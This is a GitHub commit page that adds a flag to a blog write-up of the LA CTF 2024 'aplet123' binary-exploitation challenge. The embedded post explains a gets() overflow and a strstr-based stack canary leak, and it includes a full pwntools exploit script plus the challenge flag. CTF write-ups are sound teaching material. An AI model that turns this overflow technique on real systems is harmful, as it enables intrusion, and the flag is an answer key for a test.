Skip to content

Commit

Permalink
added flag
Browse files Browse the repository at this point in the history
  • Loading branch information
daniel committed Feb 22, 2024
1 parent 46fbce5 commit bb5d858
Show file tree
Hide file tree
Showing 2 changed files with 8 additions and 3 deletions.
4 changes: 4 additions & 0 deletions content/posts/la-ctf-2024-pwn-aplet123.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -137,4 +137,8 @@ target.sendline(payload)
target.sendline('bye')

target.interactive()
```

```
lactf{so_untrue_ei2p1wfwh9np2gg6}
```
7 changes: 4 additions & 3 deletions public/posts/la-ctf-2024-pwn-aplet123/index.html
View file
Original file line number Diff line number Diff line change
Expand Up @@ -100,8 +100,8 @@
"keywords": [

],
"articleBody": "We are given a binary and source code. Taking a look at the source code:\n#include #include #include #include #include void print_flag(void) { char flag[256]; FILE *flag_file = fopen(\"flag.txt\", \"r\"); fgets(flag, sizeof flag, flag_file); puts(flag); } const char *const responses[] = {\"L\", \"amongus\", \"true\", \"pickle\", \"GINKOID\", \"L bozo\", \"wtf\", \"not with that attitude\", \"increble\", \"based\", \"so true\", \"monka\", \"wat\", \"monkaS\", \"banned\", \"holy based\", \"daz crazy\", \"smh\", \"bruh\", \"lol\", \"mfw\", \"skissue\", \"so relatable\", \"copium\", \"untrue!\", \"rolled\", \"cringe\", \"unlucky\", \"lmao\", \"eLLe\", \"loser!\", \"cope\", \"I use arch btw\"}; int main(void) { setbuf(stdout, NULL); srand(time(NULL)); char input[64]; puts(\"hello\"); while (1) { gets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); } else if (strcmp(input, \"please give me the flag\") == 0) { puts(\"i'll consider it\"); sleep(5); puts(\"no\"); } else if (strcmp(input, \"bye\") == 0) { puts(\"bye\"); break; } else { puts(responses[rand() % (sizeof responses / sizeof responses[0])]); } } } checksec --file=aplet123 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 49 Symbols No 0 3 aplet123 And taking a look at the binary with checksec we see that we have PIE turned off but we have a stack canary.\ngets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); We see that we are using gets which gives us a buffer overflow. Remeber that strstr retrusns a pointer to the first occuraence of the sequence we are seraching for. So if our input contains ‘i’m’ at the end, then we can read past the buffer and this lets us leak the canary.\ntarget.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) Recall that the least significant bit of the canary is a null byte. I believe this is to prevent the canary from being leaked if for example it is next to a string that is not null terminated in memroy that is being read.\nNow that we have the canary, we need to use the buffer overflow to overwrite the saved return address.\nComplete solve script:\nfrom pwn import * context.log_level = \"DEBUG\" printflag_addr = 0x4011e6 target = remote(\"chall.lac.tf\", 31123) target.recvuntil(\"hello\") target.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) payload = b\"A\" * 72 payload += b'\\x00' + canary payload += b\"A\" * 8 payload += p64(printflag_addr) target.sendline(payload) target.sendline('bye') target.interactive() ",
"wordCount" : "404",
"articleBody": "We are given a binary and source code. Taking a look at the source code:\n#include #include #include #include #include void print_flag(void) { char flag[256]; FILE *flag_file = fopen(\"flag.txt\", \"r\"); fgets(flag, sizeof flag, flag_file); puts(flag); } const char *const responses[] = {\"L\", \"amongus\", \"true\", \"pickle\", \"GINKOID\", \"L bozo\", \"wtf\", \"not with that attitude\", \"increble\", \"based\", \"so true\", \"monka\", \"wat\", \"monkaS\", \"banned\", \"holy based\", \"daz crazy\", \"smh\", \"bruh\", \"lol\", \"mfw\", \"skissue\", \"so relatable\", \"copium\", \"untrue!\", \"rolled\", \"cringe\", \"unlucky\", \"lmao\", \"eLLe\", \"loser!\", \"cope\", \"I use arch btw\"}; int main(void) { setbuf(stdout, NULL); srand(time(NULL)); char input[64]; puts(\"hello\"); while (1) { gets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); } else if (strcmp(input, \"please give me the flag\") == 0) { puts(\"i'll consider it\"); sleep(5); puts(\"no\"); } else if (strcmp(input, \"bye\") == 0) { puts(\"bye\"); break; } else { puts(responses[rand() % (sizeof responses / sizeof responses[0])]); } } } checksec --file=aplet123 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 49 Symbols No 0 3 aplet123 And taking a look at the binary with checksec we see that we have PIE turned off but we have a stack canary.\ngets(input); char *s = strstr(input, \"i'm\"); if (s) { printf(\"hi %s, i'm aplet123\\n\", s + 4); We see that we are using gets which gives us a buffer overflow. Remeber that strstr retrusns a pointer to the first occuraence of the sequence we are seraching for. So if our input contains ‘i’m’ at the end, then we can read past the buffer and this lets us leak the canary.\ntarget.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) Recall that the least significant bit of the canary is a null byte. I believe this is to prevent the canary from being leaked if for example it is next to a string that is not null terminated in memroy that is being read.\nNow that we have the canary, we need to use the buffer overflow to overwrite the saved return address.\nComplete solve script:\nfrom pwn import * context.log_level = \"DEBUG\" printflag_addr = 0x4011e6 target = remote(\"chall.lac.tf\", 31123) target.recvuntil(\"hello\") target.sendline(\"A\" * 69 + \"i'm\") target.recvuntil(\"hi \") canary = target.recv(7) payload = b\"A\" * 72 payload += b'\\x00' + canary payload += b\"A\" * 8 payload += p64(printflag_addr) target.sendline(payload) target.sendline('bye') target.interactive() lactf{so_untrue_ei2p1wfwh9np2gg6} ",
"wordCount" : "405",
"inLanguage": "en",
"datePublished": "2024-02-21T17:20:12-05:00",
"dateModified": "2024-02-21T17:20:12-05:00",
Expand Down Expand Up @@ -288,7 +288,8 @@ <h1 class="post-title entry-hint-parent">
</span></span><span style="display:flex;"><span>target<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">&#39;bye&#39;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>target<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div>
</span></span></code></pre></div><pre tabindex="0"><code>lactf{so_untrue_ei2p1wfwh9np2gg6}
</code></pre>

</div>

Expand Down

0 comments on commit bb5d858

Please sign in to comment.